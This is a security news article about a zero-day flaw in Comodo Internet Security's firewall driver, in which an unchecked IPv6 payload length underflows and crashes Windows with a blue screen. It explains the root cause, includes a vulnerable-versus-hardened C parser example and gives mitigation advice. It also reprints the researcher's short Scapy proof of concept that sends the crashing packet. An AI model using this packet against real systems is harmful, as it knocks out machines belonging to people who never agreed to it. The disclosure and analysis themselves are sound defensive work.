GBHackers

Comodo Internet Security 0-Day Flaw Triggers Windows System Crashes


A remotely exploitable zero-day vulnerability in Comodo Internet Security’s kernel-level firewall driver allows attackers to crash Windows systems with a single IPv6 packet, and the vendor has yet to respond.

Security researcher Marcus Hutchins publicly disclosed a critical zero-day vulnerability in Comodo Internet Security on June 3, 2026, after multiple attempts to reach the vendor failed.

Dubbed ComoDoS, the flaw resides in Inspect.sys, Comodo’s firewall kernel driver, and enables a remote Denial-of-Service (DoS) attack capable of triggering a Blue Screen of Death (BSOD) on targeted Windows machines.

How the Vulnerability Works

The bug originates in the IPv6 extension header parser inside Inspect.sys. When processing incoming IPv6 packets, the driver stores the packet’s payload length in a variable (packet_desc->payload_length). This value is entirely under the attacker’s control via the IPv6 fixed header’s payload length field.

[Figure: consecutive snippets of code illustrating the entire parse function (Source: malwaretech)]

As the parser iterates through IPv6 extension headers, it subtracts each header’s length from packet_desc->payload_length. Critically, the driver never validates the payload length field. If an attacker sets the payload length to a value smaller than the total extension header size, the unsigned 64-bit integer underflows and wraps around to approximately 18 quintillion (0xFFFFFFFFFFFFFFF8).

Because the vulnerability exists in the firewall driver itself, the malicious packet is parsed before any firewall rules are enforced — meaning the attack works even if the firewall is configured to block all ports.
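The unchecked subtraction described above, as an added C example that is not code from the article or from Inspect.sys: a hypothetical reconstruction of an extension header walker that subtracts each header's length from an attacker-controlled payload_length, beside a hardened version that validates the length before touching it. The packet_desc fields, the walk_ext_headers_* names and the sample header bytes are assumptions; the 0xFFFFFFFFFFFFFFF8 result reproduces the article's wrap-around value for a Payload Length smaller than the extension header chain.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdbool.h>
enum { NH_TCP = 6, NH_DEST_OPTS = 60 };   /* IPv6 Next Header values */

struct packet_desc {         /* hypothetical reconstruction, not Comodo's code */
    const uint8_t *ext;      /* start of the extension header chain */
    size_t ext_avail;        /* bytes actually received after the fixed header */
    uint64_t payload_length; /* copied from the IPv6 fixed header: attacker-controlled */
};

/* Vulnerable walker: subtracts each header length with no check that it fits, so a
 * too-small Payload Length wraps the unsigned 64-bit value instead of failing. */
uint64_t walk_ext_headers_vulnerable(struct packet_desc *d, uint8_t nh) {
    const uint8_t *p = d->ext;
    while (nh == NH_DEST_OPTS) {
        size_t hdr_len = ((size_t)p[1] + 1) * 8; /* RFC 8200: (Hdr Ext Len + 1) * 8 */
        d->payload_length -= hdr_len;            /* unchecked subtraction */
        nh = p[0];
        p += hdr_len;
    }
    return d->payload_length;
}
/* Hardened walker: rejects a header larger than the remaining Payload Length or than
 * the bytes actually present, so the caller can drop the packet before using it. */
bool walk_ext_headers_checked(struct packet_desc *d, uint8_t nh) {
    const uint8_t *p = d->ext;
    size_t off = 0;
    while (nh == NH_DEST_OPTS) {
        if (d->ext_avail - off < 2) return false;  /* need Next Header + Hdr Ext Len */
        size_t hdr_len = ((size_t)p[1] + 1) * 8;
        if (hdr_len > d->payload_length || hdr_len > d->ext_avail - off) return false;
        d->payload_length -= hdr_len;
        nh = p[0];
        p += hdr_len;
        off += hdr_len;
    }
    return true;
}
/* Constructed sample: a 16-byte Destination Options header (Hdr Ext Len 1, one PadN option) before TCP. */
static const uint8_t sample_ext[16] = { NH_TCP, 1, 1, 12 }; /* remaining bytes are zero */

uint64_t demo_vulnerable(void) {   /* Payload Length 8 < 16: wraps to 0xFFFFFFFFFFFFFFF8 */
    struct packet_desc d = { sample_ext, sizeof sample_ext, 8 };
    return walk_ext_headers_vulnerable(&d, NH_DEST_OPTS);
}
bool demo_checked(uint64_t plen) { /* false for Payload Length 8; true for 36 (16 + 20-byte TCP) */
    struct packet_desc d = { sample_ext, sizeof sample_ext, plen };
    return walk_ext_headers_checked(&d, NH_DEST_OPTS);
}
```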

The Proof-of-Concept

Hutchins released the full PoC, named ComoDoS, on GitHub. The exploit is remarkably compact:

from scapy.all import IPv6, IPv6ExtHdrDestOpt, PadN, TCP, send  # Scapy, as used by the PoC

# dst_ip is the target address, supplied by the caller
ext = IPv6ExtHdrDestOpt(nh=6, options=[PadN(optdata=b"\x00" * 8)])  # Destination Options, next header TCP
tcp = TCP(sport=1337, dport=80, flags="S", seq=0, ack=1, window=0x2000)
ipv6 = IPv6(dst=dst_ip, nh=60, hlim=64, plen=8)  # plen deliberately smaller than the header chain
pkt = ipv6 / ext / tcp
send(pkt)

A single malformed IPv6 packet is enough to crash the target system. Hutchins used the “Destination Options” extension header (nh=60) specifically because it is the least likely to be dropped by intermediate routers, making remote exploitation more reliable.

While the integer underflow also triggers an out-of-bounds (OOB) read and a reachable OOB write primitive, Hutchins assessed that remote code execution (RCE) is unlikely.

The OOB read is constrained by a WebDAV artifact scanner that terminates early when it encounters standard HTTP headers. The OOB write, meanwhile, uses a memcpy operation with the corrupted size value truncated to 32 bits, resulting in a guaranteed 4 GB kernel pool overflow that crashes the system before any code can execute.

Hutchins submitted a full report, root-cause analysis, patch recommendations, and the PoC to Comodo’s security team, but received no response, even after two follow-ups. Comodo also has no public bug bounty program.

A prior ZDI advisory (ZDI-24-953) noted that the same vendor ignored patch requests for nearly two years, establishing a troubling pattern of unresponsiveness.

No official patch is available. Organizations running Comodo Internet Security should monitor for anomalous IPv6 traffic at the network perimeter and consider blocking IPv6 extension headers, particularly Destination Options (Next Header = 60), at edge devices until Comodo issues a fix.
